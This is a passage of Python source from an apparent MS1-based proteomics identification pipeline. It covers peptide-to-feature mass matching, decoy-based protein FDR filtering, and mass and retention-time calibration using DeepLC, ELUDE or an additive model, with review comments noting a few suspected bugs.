                for k in n_map_dict[n_val]:
                    v = prots_spc[k]
                    if n_val not in best_match_dict or v > prots_spc[best_match_dict[n_val]]:
                        best_match_dict[n_val] = k
            n_arr_small = []
            names_arr_small = []
            v_arr_small = []
            for k, v in best_match_dict.items():
                n_arr_small.append(k)
                names_arr_small.append(v)
                v_arr_small.append(prots_spc[v])

            prots_spc_basic = dict()
            all_pvals = calc_sf_all(np.array(v_arr_small), n_arr_small, p)
            for idx, k in enumerate(names_arr_small):
                prots_spc_basic[k] = all_pvals[idx]

            if not p0:
                # First iteration: dump the full, no-exclusion ranking.
                p0 = float(p)

                prots_spc_tmp = dict()
                v_arr = np.array([prots_spc[k] for k in names_arr])
                all_pvals = calc_sf_all(v_arr, n_arr, p)
                for idx, k in enumerate(names_arr):
                    prots_spc_tmp[k] = all_pvals[idx]

                sortedlist_spc = sorted(prots_spc_tmp.items(), key=operator.itemgetter(1))[::-1]
                with open(base_out_name + '_proteins_full_noexclusion.tsv', 'w') as output:
                    output.write('dbname\tscore\tmatched peptides\ttheoretical peptides\n')
                    for x in sortedlist_spc:
                        output.write('\t'.join((x[0], str(x[1]), str(prots_spc_copy[x[0]]), str(protsN[x[0]]))) + '\n')

            best_prot = utils.keywithmaxval(prots_spc_basic)
            best_score = prots_spc_basic[best_prot]
            unstable_prots = set()
            if best_prot not in prots_spc_final:
                # Accept the best protein and release its peptides: any
                # peptide whose match count drops to zero decrements the
                # counts of all other proteins sharing it.
                prots_spc_final[best_prot] = best_score
                banned_pids = set()
                for pep in prots_spc2[best_prot]:
                    for pid in pep_pid[pep]:
                        banned_pids.add(pid)
                for pid in banned_pids:
                    for pep in pid_pep[pid]:
                        banned_dict[pep] -= 1
                        if banned_dict[pep] == 0:
                            for bprot in pept_prot[pep]:
                                tmp_spc_new[bprot] -= 1
                                unstable_prots.add(bprot)
            else:
                # No new protein could be chosen: finalize remaining scores.
                v_arr = np.array([prots_spc[k] for k in names_arr])
                all_pvals = calc_sf_all(v_arr, n_arr, p)
                for idx, k in enumerate(names_arr):
                    prots_spc_basic[k] = all_pvals[idx]
                for k, v in prots_spc_basic.items():
                    if k not in prots_spc_final:
                        prots_spc_final[k] = v
                break

            prot_fdr = aux.fdr(prots_spc_final.items(), is_decoy=isdecoy)
            if prot_fdr >= 12.5 * fdr:
                # FDR budget exhausted: finalize remaining scores and stop.
                v_arr = np.array([prots_spc[k] for k in names_arr])
                all_pvals = calc_sf_all(v_arr, n_arr, p)
                for idx, k in enumerate(names_arr):
                    prots_spc_basic[k] = all_pvals[idx]
                for k, v in prots_spc_basic.items():
                    if k not in prots_spc_final:
                        prots_spc_final[k] = v
                break

    # NOTE(review): if resdict['seqs'] is empty, prots_spc_final is never
    # bound and the next line raises NameError — confirm callers guarantee
    # non-empty results.
    prots_spc_basic2 = copy(prots_spc_final)
    prots_spc_final = dict()
    prots_spc_final2 = dict()

    if n == 0:
        try:
            n = cpu_count()
        except NotImplementedError:
            n = 1

    # Rescore with 10 mass/RT tolerance coefficients; average the scores.
    # On Windows (or single-core) run in-process, otherwise fan out.
    if n == 1 or os.name == 'nt':
        qin = []
        qout = []
        for mass_koef in range(10):
            rtt_koef = mass_koef
            qin.append((mass_koef, rtt_koef))
        qout = worker(qin, qout, mass_diff, rt_diff, resdict, protsN, pept_prot, isdecoy_key, isdecoy, fdr, prots_spc_basic2, True)
        for item, item2 in qout:
            if item2:
                prots_spc_copy = item2
            for k in protsN:
                if k not in prots_spc_final:
                    prots_spc_final[k] = [item.get(k, 0.0), ]
                else:
                    prots_spc_final[k].append(item.get(k, 0.0))
    else:
        qin = Queue()
        qout = Queue()
        for mass_koef in range(10):
            rtt_koef = mass_koef
            qin.put((mass_koef, rtt_koef))
        # One None sentinel per worker process.
        for _ in range(n):
            qin.put(None)

        procs = []
        for proc_num in range(n):
            p = Process(target=worker, args=(qin, qout, mass_diff, rt_diff, resdict, protsN, pept_prot, isdecoy_key, isdecoy, fdr, prots_spc_basic2))
            p.start()
            procs.append(p)

        for _ in range(n):
            for item, item2 in iter(qout.get, None):
                if item2:
                    prots_spc_copy = item2
                for k in protsN:
                    if k not in prots_spc_final:
                        prots_spc_final[k] = [item.get(k, 0.0), ]
                    else:
                        prots_spc_final[k].append(item.get(k, 0.0))

        for p in procs:
            p.join()

    # Average the per-coefficient scores for every protein.
    for k in prots_spc_final.keys():
        prots_spc_final[k] = np.mean(prots_spc_final[k])

    prots_spc = deepcopy(prots_spc_final)
    sortedlist_spc = sorted(prots_spc.items(), key=operator.itemgetter(1))[::-1]
    with open(base_out_name + '_proteins_full.tsv', 'w') as output:
        output.write('dbname\tscore\tmatched peptides\ttheoretical peptides\n')
        for x in sortedlist_spc:
            output.write('\t'.join((x[0], str(x[1]), str(prots_spc_copy[x[0]]), str(protsN[x[0]]))) + '\n')

    # Target/decoy competition: keep only the better-scoring member of
    # each target/decoy accession pair.
    checked = set()
    for k, v in list(prots_spc.items()):
        if k not in checked:
            if isdecoy_key(k):
                if prots_spc.get(k.replace(prefix, ''), -1e6) > v:
                    del prots_spc[k]
                    checked.add(k.replace(prefix, ''))
            else:
                if prots_spc.get(prefix + k, -1e6) > v:
                    del prots_spc[k]
                    checked.add(prefix + k)

    filtered_prots = aux.filter(prots_spc.items(), fdr=fdr, key=escore, is_decoy=isdecoy, remove_decoy=True, formula=1, full_output=True, correction=1)
    if len(filtered_prots) < 1:
        # Retry without the conservative decoy-count correction.
        filtered_prots = aux.filter(prots_spc.items(), fdr=fdr, key=escore, is_decoy=isdecoy, remove_decoy=True, formula=1, full_output=True, correction=0)
    identified_proteins = 0

    for x in filtered_prots:
        identified_proteins += 1

    print('TOP 5 identified proteins:')
    print('dbname\tscore\tnum matched peptides\tnum theoretical peptides')
    for x in filtered_prots[:5]:
        print('\t'.join((str(x[0]), str(x[1]), str(int(prots_spc_copy[x[0]])), str(protsN[x[0]]))))
    print('results:%s;number of identified proteins = %d' % (base_out_name, identified_proteins, ))
    # print('R=', r)
    with open(base_out_name + '_proteins.tsv', 'w') as output:
        output.write('dbname\tscore\tmatched peptides\ttheoretical peptides\n')
        for x in filtered_prots:
            output.write('\t'.join((x[0], str(x[1]), str(prots_spc_copy[x[0]]), str(protsN[x[0]]))) + '\n')

    if fname:
        # QC figure: RT, mass and log-intensity histograms of all features.
        fig = plt.figure(figsize=(16, 12))
        DPI = fig.get_dpi()
        fig.set_size_inches(2000.0/float(DPI), 2000.0/float(DPI))

        df0 = pd.read_table(os.path.splitext(fname)[0].replace('.features', '') + '.features' + '.tsv')

        # Features RT distribution
        # TODO add matched features and matched to 1% FDR proteins features
        ax = fig.add_subplot(3, 1, 1)
        bns = np.arange(0, df0['rtApex'].max() + 1, 1)
        ax.hist(df0['rtApex'], bins = bns)
        ax.set_xlabel('RT, min', size=16)
        ax.set_ylabel('# features', size=16)

        # Features mass distribution
        # TODO add matched features and matched to 1% FDR proteins features
        ax = fig.add_subplot(3, 1, 2)
        bns = np.arange(0, df0['massCalib'].max() + 6, 5)
        ax.hist(df0['massCalib'], bins = bns)
        ax.set_xlabel('neutral mass, Da', size=16)
        ax.set_ylabel('# features', size=16)

        # Features intensity distribution
        # TODO add matched features and matched to 1% FDR proteins features
        ax = fig.add_subplot(3, 1, 3)
        bns = np.arange(np.log10(df0['intensityApex'].min()) - 0.5, np.log10(df0['intensityApex'].max()) + 0.5, 0.5)
        ax.hist(np.log10(df0['intensityApex']), bins = bns)
        ax.set_xlabel('log10(Intensity)', size=16)
        ax.set_ylabel('# features', size=16)

        plt.savefig(base_out_name + '.png')
def noisygaus(x, a, x0, sigma, b):
    """Gaussian with a constant baseline: a*exp(-(x-x0)^2/(2*sigma^2)) + b.

    Model function for curve_fit in the mass/RT calibration routines.
    Uses np.exp: the `scipy.exp` alias imported at the top of this file
    was deprecated in SciPy 1.3 and later removed, and np.exp also
    vectorizes over the array inputs curve_fit supplies.
    """
    return a * np.exp(-(x - x0) ** 2 / (2 * sigma ** 2)) + b
def calibrate_mass(bwidth, mass_left, mass_right, true_md):
    """Fit a noisy Gaussian to the histogram of mass errors.

    Histograms *true_md* over [-mass_left, mass_right) with bin width
    *bwidth* and fits `noisygaus` to it.

    :returns: (mass shift, mass sigma, variance of the amplitude estimate).
    """
    edges = np.arange(-mass_left, mass_right, bwidth)
    counts, centers = np.histogram(true_md, bins=edges)
    centers = (centers + bwidth)[:-1]
    popt, pcov = curve_fit(noisygaus, centers, counts, p0=[1, np.median(true_md), 1, 1])
    shift, sigma = popt[1], abs(popt[2])
    return shift, sigma, pcov[0][0]
def calibrate_RT_gaus(bwidth, mass_left, mass_right, true_md):
    """Fit a noisy Gaussian to the histogram of retention-time errors.

    Same procedure as `calibrate_mass`, but the initial sigma guess is
    scaled to the bin width (bwidth * 5), suiting the wider RT spread.

    :returns: (RT shift, RT sigma, variance of the amplitude estimate).
    """
    edges = np.arange(-mass_left, mass_right, bwidth)
    counts, centers = np.histogram(true_md, bins=edges)
    centers = (centers + bwidth)[:-1]
    popt, pcov = curve_fit(noisygaus, centers, counts, p0=[1, np.median(true_md), bwidth * 5, 1])
    shift, sigma = popt[1], abs(popt[2])
    return shift, sigma, pcov[0][0]
def process_file(args):
    """Run a full search for one input file.

    Clears the per-run target/decoy caches, (re)builds the decoy database
    described by *args*, and launches the peptide search.
    """
    utils.seen_target.clear()
    utils.seen_decoy.clear()
    args = utils.prepare_decoy_db(args)
    return process_peptides(args)
def peptide_processor(peptide, **kwargs):
    """Match one peptide sequence against the (global) sorted feature masses.

    Computes the peptide's neutral mass including any configured terminal
    modifications, locates all features within the ppm tolerance window by
    binary search on the sorted global `nmasses` array, and returns one
    tuple ``(sequence, mass difference in ppm, mods flag, feature index)``
    per match.

    Expected kwargs: 'aa_mass' (amino-acid mass table), 'acc_l'/'acc_r'
    (left/right ppm tolerances).
    """
    seqm = peptide
    results = []
    m = cmass.fast_mass(seqm, aa_mass=kwargs['aa_mass']) + kwargs['aa_mass'].get('Nterm', 0) + kwargs['aa_mass'].get('Cterm', 0)
    acc_l = kwargs['acc_l']
    acc_r = kwargs['acc_r']
    dm_l = acc_l * m / 1.0e6
    if acc_r == acc_l:
        dm_r = dm_l
    else:
        dm_r = acc_r * m / 1.0e6
    # nmasses is sorted by neutral mass, so the tolerance window is a
    # contiguous index range.
    start = nmasses.searchsorted(m - dm_l)
    end = nmasses.searchsorted(m + dm_r)
    for i in range(start, end):
        # Fix: dropped the unused `peak_id = ids[i]` and `I = Is[i]`
        # lookups — dead per-match array reads.
        massdiff = (m - nmasses[i]) / m * 1e6
        mods = 0
        results.append((seqm, massdiff, mods, i))
    return results
def prepare_peptide_processor(fname, args):
    """Load the feature file and set up the globals used by peptide_processor.

    Reads isotopic-cluster features, sorts them by neutral mass (so the
    matcher can binary-search), publishes per-feature columns as module
    globals, and builds the amino-acid mass table including fixed
    modifications.

    :param fname: path to the features file.
    :param args: parsed run options ('cmin', 'cmax', 'i', 'sc', 'fmods',
        'ptol', ...).
    :returns: (kwargs dict for peptide_processor, sorted feature DataFrame).
    """
    global nmasses
    global rts
    global charges
    global ids
    global Is
    global Scans
    global Isotopes
    global mzraw
    global avraw
    global imraw
    min_ch = args['cmin']
    max_ch = args['cmax']

    min_isotopes = args['i']
    min_scans = args['sc']

    print('Reading spectra ...')
    df_features = utils.iterate_spectra(fname, min_ch, max_ch, min_isotopes, min_scans)

    # Sort by neutral mass
    df_features = df_features.sort_values(by='massCalib')

    nmasses = df_features['massCalib'].values
    rts = df_features['rtApex'].values
    charges = df_features['charge'].values
    ids = df_features['id'].values
    Is = df_features['intensityApex'].values
    Scans = df_features['nScans'].values
    Isotopes = df_features['nIsotopes'].values
    mzraw = df_features['mz'].values
    avraw = np.zeros(len(df_features))
    # Prefer FAIMS compensation voltages when the column actually varies;
    # otherwise fall back to the ion-mobility column.
    if len(set(df_features['FAIMS'])) > 1:
        imraw = df_features['FAIMS'].values
    else:
        imraw = df_features['ion_mobility'].values

    print('Number of peptide isotopic clusters: %d' % (len(nmasses), ))

    fmods = args['fmods']
    # NOTE(review): aa_mass aliases pyteomics' shared std_aa_mass dict and
    # is mutated in place below — confirm this cross-run leakage is intended.
    aa_mass = mass.std_aa_mass
    if fmods:
        # Fixed modifications come as 'mass@aa'; '[' = N-term, ']' = C-term.
        for mod in fmods.split(','):
            m, aa = mod.split('@')
            if aa == '[':
                aa_mass['Nterm'] = float(m)
            elif aa == ']':
                aa_mass['Cterm'] = float(m)
            else:
                aa_mass[aa] += float(m)

    acc_l = args['ptol']
    acc_r = args['ptol']

    return {'aa_mass': aa_mass, 'acc_l': acc_l, 'acc_r': acc_r, 'args': args}, df_features
def peptide_processor_iter_isoforms(peptide, **kwargs):
    """Wrap peptide_processor's result list in a single-element list.

    Keeps the interface shape expected by utils.multimap, which iterates
    one result group per (future) isoform.
    """
    return [peptide_processor(peptide, **kwargs)]
def get_results(ms1results):
    """Transpose the list of match tuples into a dict of numpy arrays.

    Each match tuple is (sequence, ppm mass difference, mods flag,
    original feature index); the returned dict maps the labels 'seqs',
    'md', 'mods', 'iorig' to column arrays.
    """
    labels = [
        'seqs',
        'md',
        'mods',
        'iorig',
    ]
    columns = zip(*ms1results)
    return {label: np.array(column) for label, column in zip(labels, columns)}
def filter_results(resultdict, idx):
    """Return a copy of *resultdict* with every array indexed by *idx*.

    *idx* may be any numpy fancy index (boolean mask or index array); the
    same selection is applied to every column so rows stay aligned.
    """
    return {label: resultdict[label][idx] for label in resultdict}
def process_peptides(args):
    """Run the MS1-only peptide/protein identification pipeline for one file.

    Stages, all driven by the ``args`` option dict:
      1. match theoretical peptides against detected isotopic clusters;
      2. preliminary protein scoring and FDR filtering;
      3. mass-error recalibration (Gaussian fit of the mass differences);
      4. retention-time model training (DeepLC, ELUDE or the additive achrom
         model; optionally two-stage via ``args['ts']``) and RT filtering;
      5. PFM feature-table construction and optional LightGBM rescoring
         (``args['ml']``);
      6. final iterative protein inference via ``final_iteration``.

    Writes ``*_log.txt``, ``*_protsN.tsv``, ``*_PFMs.tsv`` and
    ``*_PFMs_ML.tsv`` next to the input file (or into ``args['outpath']``).

    NOTE(review): relies on module-level arrays filled by
    prepare_peptide_processor (``Isotopes``, ``rts``, ``mzraw``, ``ids``,
    ``Is``, ``Scans``, ``charges``, ``avraw``, ``imraw``) — presumably
    globals set per input file; confirm before reusing concurrently.
    """
    fname = args['file']
    fdr = args['fdr'] / 100
    min_isotopes_calibration = args['ci']
    try:
        outpath = args['outpath']
    except:
        outpath = False
    if outpath:
        base_out_name = os.path.splitext(os.path.join(outpath, os.path.basename(fname)))[0]
    else:
        base_out_name = os.path.splitext(fname)[0]
    # NOTE(review): the first open/close pair is redundant — mode 'w'
    # already truncates; kept as-is (doc-only change).
    out_log = open(base_out_name + '_log.txt', 'w')
    out_log.close()
    out_log = open(base_out_name + '_log.txt', 'w')
    elude_path = args['elude']
    elude_path = elude_path.strip()
    deeplc_path = args['deeplc']
    deeplc_path = deeplc_path.strip()
    calib_path = args['pl']
    calib_path = calib_path.strip()
    # A user-supplied calibration peptide list replaces the first RT stage.
    if calib_path and args['ts']:
        args['ts'] = 0
        print('Two-stage RT prediction does not work with list of MS/MS identified peptides...')
    args['enzyme'] = utils.get_enzyme(args['e'])
    ms1results = []
    peps = utils.peptide_gen(args)
    kwargs, df_features = prepare_peptide_processor(fname, args)
    func = peptide_processor_iter_isoforms
    # Stage 1: match every theoretical peptide against the detected features.
    print('Running the search ...')
    for y in utils.multimap(1, func, peps, **kwargs):
        for result in y:
            if len(result):
                ms1results.extend(result)
    prefix = args['prefix']
    protsN, pept_prot = utils.get_prot_pept_map(args)
    resdict = get_results(ms1results)
    del ms1results
    # Missed-cleavage count per matched sequence.
    resdict['mc'] = np.array([parser.num_sites(z, args['enzyme']) for z in resdict['seqs']])
    isdecoy = lambda x: x[0].startswith(prefix)
    isdecoy_key = lambda x: x.startswith(prefix)
    escore = lambda x: -x[1]
    # Stage 2: preliminary search restricted to well-supported matches
    # (enough isotopes, no missed cleavages).
    e_ind = np.array([Isotopes[iorig] for iorig in resdict['iorig']]) >= min_isotopes_calibration
    # e_ind = resdict['Isotopes'] >= min_isotopes_calibration
    # e_ind = resdict['Isotopes'] >= 1
    resdict2 = filter_results(resdict, e_ind)
    e_ind = resdict2['mc'] == 0
    resdict2 = filter_results(resdict2, e_ind)
    p1 = set(resdict2['seqs'])
    if len(p1):
        prots_spc2 = defaultdict(set)
        for pep, proteins in pept_prot.items():
            if pep in p1:
                for protein in proteins:
                    prots_spc2[protein].add(pep)
        for k in protsN:
            if k not in prots_spc2:
                prots_spc2[k] = set([])
        prots_spc = dict((k, len(v)) for k, v in prots_spc2.items())
        names_arr = np.array(list(prots_spc.keys()))
        v_arr = np.array(list(prots_spc.values()))
        n_arr = np.array([protsN[k] for k in prots_spc])
        # Per-peptide match probability estimated from the decoy proteins.
        top100decoy_score = [prots_spc.get(dprot, 0) for dprot in protsN if isdecoy_key(dprot)]
        top100decoy_N = [val for key, val in protsN.items() if isdecoy_key(key)]
        p = np.mean(top100decoy_score) / np.mean(top100decoy_N)
        print('p=%s' % (np.mean(top100decoy_score) / np.mean(top100decoy_N)))
        prots_spc = dict()
        all_pvals = calc_sf_all(v_arr, n_arr, p)
        for idx, k in enumerate(names_arr):
            prots_spc[k] = all_pvals[idx]
        # Keep only the better-scoring member of each target/decoy pair.
        checked = set()
        for k, v in list(prots_spc.items()):
            if k not in checked:
                if isdecoy_key(k):
                    if prots_spc.get(k.replace(prefix, ''), -1e6) > v:
                        del prots_spc[k]
                        checked.add(k.replace(prefix, ''))
                else:
                    if prots_spc.get(prefix + k, -1e6) > v:
                        del prots_spc[k]
                        checked.add(prefix + k)
        filtered_prots = aux.filter(prots_spc.items(), fdr=0.05, key=escore, is_decoy=isdecoy, remove_decoy=True, formula=1,
                                    full_output=True)
        identified_proteins = 0
        for x in filtered_prots:
            identified_proteins += 1
        print('results for default search: number of identified proteins = %d' % (identified_proteins, ))
        # Stage 3: recalibrate mass errors using peptides from the proteins
        # identified in the preliminary search.
        print('Running mass recalibration...')
        e_ind = resdict['mc'] == 0
        resdict2 = filter_results(resdict, e_ind)
        true_md = []
        true_isotopes = []
        true_seqs = []
        true_prots = set(x[0] for x in filtered_prots)
        for pep, proteins in pept_prot.items():
            if any(protein in true_prots for protein in proteins):
                true_seqs.append(pep)
        e_ind = np.in1d(resdict2['seqs'], true_seqs)
        true_seqs = resdict2['seqs'][e_ind]
        true_md.extend(resdict2['md'][e_ind])
        true_md = np.array(true_md)
        # true_isotopes.extend(resdict2['Isotopes'][e_ind])
        true_isotopes.extend(np.array([Isotopes[iorig] for iorig in resdict2['iorig']])[e_ind])
        true_isotopes = np.array(true_isotopes)
        true_intensities = np.array([Is[iorig] for iorig in resdict2['iorig']])[e_ind]
        # true_intensities = np.array(resdict2['Is'][e_ind])
        # true_rt = np.array(resdict2['rt'][e_ind])
        # true_mz = np.array(resdict2['mzraw'][e_ind])
        true_rt = np.array([rts[iorig] for iorig in resdict2['iorig']])[e_ind]
        true_mz = np.array([mzraw[iorig] for iorig in resdict2['iorig']])[e_ind]
        df1 = pd.DataFrame()
        df1['mass diff'] = true_md
        df1['mz'] = true_mz
        df1['RT'] = true_rt
        df1['Intensity'] = true_intensities
        df1['seqs'] = true_seqs
        df1['orig_md'] = true_md
        mass_left = args['ptol']
        mass_right = args['ptol']
        # Retry the Gaussian fit with a coarser initial bin width on failure.
        try:
            mass_shift, mass_sigma, covvalue = calibrate_mass(0.001, mass_left, mass_right, true_md)
        except:
            mass_shift, mass_sigma, covvalue = calibrate_mass(0.01, mass_left, mass_right, true_md)
        print('Calibrated mass shift: ', mass_shift)
        print('Calibrated mass sigma in ppm: ', mass_sigma)
        out_log.write('Calibrated mass shift: %s\n' % (mass_shift, ))
        out_log.write('Calibrated mass sigma in ppm: %s\n' % (mass_sigma, ))
        # Keep matches within 3 sigma of the calibrated mass error.
        e_all = abs(resdict['md'] - mass_shift) / (mass_sigma)
        r = 3.0
        e_ind = e_all <= r
        resdict = filter_results(resdict, e_ind)
        zs_all = e_all[e_ind] ** 2
        # Re-run the preliminary protein search on mass-calibrated matches.
        e_ind = np.array([Isotopes[iorig] for iorig in resdict['iorig']]) >= min_isotopes_calibration
        resdict2 = filter_results(resdict, e_ind)
        e_ind = resdict2['mc'] == 0
        resdict2 = filter_results(resdict2, e_ind)
        p1 = set(resdict2['seqs'])
        prots_spc2 = defaultdict(set)
        for pep, proteins in pept_prot.items():
            if pep in p1:
                for protein in proteins:
                    prots_spc2[protein].add(pep)
        for k in protsN:
            if k not in prots_spc2:
                prots_spc2[k] = set([])
        prots_spc = dict((k, len(v)) for k, v in prots_spc2.items())
        names_arr = np.array(list(prots_spc.keys()))
        v_arr = np.array(list(prots_spc.values()))
        n_arr = np.array([protsN[k] for k in prots_spc])
        top100decoy_score = [prots_spc.get(dprot, 0) for dprot in protsN if isdecoy_key(dprot)]
        top100decoy_N = [val for key, val in protsN.items() if isdecoy_key(key)]
        p = np.mean(top100decoy_score) / np.mean(top100decoy_N)
        print('p=%s' % (np.mean(top100decoy_score) / np.mean(top100decoy_N)))
        prots_spc = dict()
        all_pvals = calc_sf_all(v_arr, n_arr, p)
        for idx, k in enumerate(names_arr):
            prots_spc[k] = all_pvals[idx]
        checked = set()
        for k, v in list(prots_spc.items()):
            if k not in checked:
                if isdecoy_key(k):
                    if prots_spc.get(k.replace(prefix, ''), -1e6) > v:
                        del prots_spc[k]
                        checked.add(k.replace(prefix, ''))
                else:
                    if prots_spc.get(prefix + k, -1e6) > v:
                        del prots_spc[k]
                        checked.add(prefix + k)
        filtered_prots = aux.filter(prots_spc.items(), fdr=0.05, key=escore, is_decoy=isdecoy, remove_decoy=True, formula=1,
                                    full_output=True)
        identified_proteins = 0
        for x in filtered_prots:
            identified_proteins += 1
        print('results for default search after mass calibration: number of identified proteins = %d' % (identified_proteins, ))
        # Stage 4: build the RT training set from confidently matched peptides.
        print('Running RT prediction...')
        e_ind = np.array([Isotopes[iorig] for iorig in resdict['iorig']]) >= min_isotopes_calibration
        # e_ind = resdict['Isotopes'] >= min_isotopes_calibration
        # e_ind = resdict['Isotopes'] >= 1
        resdict2 = filter_results(resdict, e_ind)
        e_ind = resdict2['mc'] == 0
        resdict2 = filter_results(resdict2, e_ind)
        true_seqs = []
        true_rt = []
        true_isotopes = []
        true_prots = set(x[0] for x in filtered_prots)#[:5])
        for pep, proteins in pept_prot.items():
            if any(protein in true_prots for protein in proteins):
                true_seqs.append(pep)
        e_ind = np.in1d(resdict2['seqs'], true_seqs)
        true_seqs = resdict2['seqs'][e_ind]
        true_rt.extend(np.array([rts[iorig] for iorig in resdict2['iorig']])[e_ind])
        # true_rt.extend(resdict2['rt'][e_ind])
        true_rt = np.array(true_rt)
        true_isotopes.extend(np.array([Isotopes[iorig] for iorig in resdict2['iorig']])[e_ind])
        # true_isotopes.extend(resdict2['Isotopes'][e_ind])
        true_isotopes = np.array(true_isotopes)
        e_all = abs(resdict2['md'][e_ind] - mass_shift) / (mass_sigma)
        zs_all_tmp = e_all ** 2
        e_ind = true_isotopes >= min_isotopes_calibration
        true_seqs = true_seqs[e_ind]
        true_rt = true_rt[e_ind]
        true_isotopes = true_isotopes[e_ind]
        zs_all_tmp = zs_all_tmp[e_ind]
        # Keep the 2500 matches with the smallest mass error for training.
        e_ind = np.argsort(zs_all_tmp)
        true_seqs = true_seqs[e_ind]
        true_rt = true_rt[e_ind]
        true_isotopes = true_isotopes[e_ind]
        true_seqs = true_seqs[:2500]
        true_rt = true_rt[:2500]
        true_isotopes = true_isotopes[:2500]
        # Collapse duplicate sequences to their median RT.
        best_seq = defaultdict(list)
        newseqs = []
        newRTs = []
        for seq, RT in zip(true_seqs, true_rt):
            best_seq[seq].append(RT)
        for k, v in best_seq.items():
            newseqs.append(k)
            newRTs.append(np.median(v))
        true_seqs = np.array(newseqs)
        true_rt = np.array(newRTs)
        # Optional external calibration peptide list overrides the training set.
        if calib_path:
            df1 = pd.read_csv(calib_path, sep='\t')
            true_seqs2 = df1['peptide'].values
            true_rt2 = df1['RT exp'].values
        else:
            true_seqs2 = true_seqs
            true_rt2 = true_rt
        # First-stage RT model: DeepLC, ELUDE, or the additive achrom model.
        if args['ts'] != 2 and deeplc_path:
            outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
            outtrain = open(outtrain_name, 'w')
            outcalib_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
            outcalib = open(outcalib_name, 'w')
            outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
            ns = true_seqs
            nr = true_rt
            print('Peptides used for RT prediction: %d' % (len(ns), ))
            ns2 = true_seqs2
            nr2 = true_rt2
            # DeepLC input: fixed Carbamidomethyl on every cysteine.
            outtrain.write('seq,modifications,tr\n')
            for seq, RT in zip(ns2, nr2):
                mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
                outtrain.write(seq + ',' + str(mods_tmp) + ',' + str(RT) + '\n')
            outtrain.close()
            outcalib.write('seq,modifications,tr\n')
            for seq, RT in zip(ns, nr):
                mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
                outcalib.write(seq + ',' + str(mods_tmp) + ',' + str(RT) + '\n')
            outcalib.close()
            subprocess.call([deeplc_path, '--file_pred', outcalib_name, '--file_cal', outtrain_name, '--file_pred_out', outres_name])
            pepdict = dict()
            train_RT = []
            train_seq = []
            for x in open(outres_name).readlines()[1:]:
                _, seq, _, RTexp, RT = x.strip().split(',')
                pepdict[seq] = float(RT)
                train_seq.append(seq)
                train_RT.append(float(RTexp))
            train_RT = np.array(train_RT)
            RT_pred = np.array([pepdict[s] for s in train_seq])
            # Fit a Gaussian to predicted-minus-observed RT, widening the
            # initial bin width (and falling back to fixed widths) until
            # the fit converges.
            rt_diff_tmp = RT_pred - train_RT
            RT_left = -min(rt_diff_tmp)
            RT_right = max(rt_diff_tmp)
            try:
                start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 100
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
            except:
                start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
            if np.isinf(covvalue):
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
            if np.isinf(covvalue):
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
            print('Calibrated RT shift: ', XRT_shift)
            print('Calibrated RT sigma: ', XRT_sigma)
            aa, bb, RR, ss = aux.linear_regression(RT_pred, train_RT)
        else:
            if args['ts'] != 2 and elude_path:
                outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
                outtrain = open(outtrain_name, 'w')
                outcalib_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
                outcalib = open(outcalib_name, 'w')
                outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
                ns = true_seqs
                nr = true_rt
                print('Peptides used for RT prediction: %d' % (len(ns), ))
                ns2 = true_seqs2
                nr2 = true_rt2
                for seq, RT in zip(ns, nr):
                    outtrain.write(seq + '\t' + str(RT) + '\n')
                outtrain.close()
                for seq, RT in zip(ns, nr):
                    outcalib.write(seq + '\t' + str(RT) + '\n')
                outcalib.close()
                subprocess.call([elude_path, '-t', outtrain_name, '-e', outcalib_name, '-a', '-g', '-o', outres_name])
                pepdict = dict()
                train_RT = []
                train_seq = []
                for x in open(outres_name).readlines()[3:]:
                    seq, RT, RTexp = x.strip().split('\t')
                    pepdict[seq] = float(RT)
                    train_seq.append(seq)
                    train_RT.append(float(RTexp))
                train_RT = np.array(train_RT)
                # NOTE(review): RT_pred is used here before being assigned in
                # this branch — presumably should be rebuilt from pepdict as
                # in the DeepLC branch; confirm against upstream history.
                rt_diff_tmp = RT_pred - train_RT
                RT_left = -min(rt_diff_tmp)
                RT_right = max(rt_diff_tmp)
                start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
                if np.isinf(covvalue):
                    XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
                if np.isinf(covvalue):
                    XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
                print('Calibrated RT shift: ', XRT_shift)
                print('Calibrated RT sigma: ', XRT_sigma)
                aa, bb, RR, ss = aux.linear_regression(RT_pred, train_RT)
            else:
                # Fallback: additive retention-coefficient model (achrom).
                ns = true_seqs
                nr = true_rt
                ns2 = true_seqs2
                nr2 = true_rt2
                RC = achrom.get_RCs_vary_lcp(ns2, nr2)
                RT_pred = np.array([achrom.calculate_RT(s, RC) for s in ns])
                train_RT = nr
                aa, bb, RR, ss = aux.linear_regression(RT_pred, nr)
                rt_diff_tmp = RT_pred - nr
                RT_left = -min(rt_diff_tmp)
                RT_right = max(rt_diff_tmp)
                start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
                if np.isinf(covvalue):
